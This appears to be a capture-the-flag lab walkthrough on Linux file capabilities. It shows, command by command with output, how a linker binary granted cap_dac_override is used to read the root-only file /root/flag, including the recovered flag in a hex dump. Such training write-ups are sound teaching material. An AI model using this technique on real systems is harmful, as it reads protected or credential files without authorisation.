One of the files on the machine was granted a capability in the permitted capability set.
Objective: By leveraging the capability provided to the file, escalate to root and retrieve the flag!
Use getcap to find out which program have “special” capability. Programs with CAP_DAC_OVERRIDE can bypass file read, write, and execute permission checks.
student@localhost:~$ getcap -r / 2>/dev/null
/usr/bin/x86_64-linux-gnu-ld.bfd = cap_dac_override+ep
Trying my luck to find out where the flag is stored.
student@localhost:~$ /usr/bin/x86_64-linux-gnu-ld.bfd /tmp/flag
/usr/bin/x86_64-linux-gnu-ld.bfd: cannot find /tmp/flag: No such file or directory
student@localhost:~$ /usr/bin/x86_64-linux-gnu-ld.bfd /root/flag
/usr/bin/x86_64-linux-gnu-ld.bfd:/root/flag: file format not recognized; treating as linker script
/usr/bin/x86_64-linux-gnu-ld.bfd:/root/flag:1: syntax error
How to use the linker to read arbitary files? Link them into a binary.
student@localhost:~$ /usr/bin/x86_64-linux-gnu-ld.bfd -r -b binary /root/flag -o flag.o
Then use xxd to see the flag in the built binary.
student@localhost:~$ xxd flag.o
00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000 .ELF............
00000010: 0100 3e00 0100 0000 0000 0000 0000 0000 ..>.............
00000020: 0000 0000 0000 0000 5001 0000 0000 0000 ........P.......
00000030: 0000 0000 4000 0000 0000 4000 0500 0400 ....@.....@.....
00000040: 3064 6233 3161 6562 3033 3936 6364 3839 0db31aeb0396cd89
00000050: 3664 6638 3732 6333 6132 3337 3039 3661 6df872c3a237096a
00000060: 0a00 0000 0000 0000 0000 0000 0000 0000 ................
...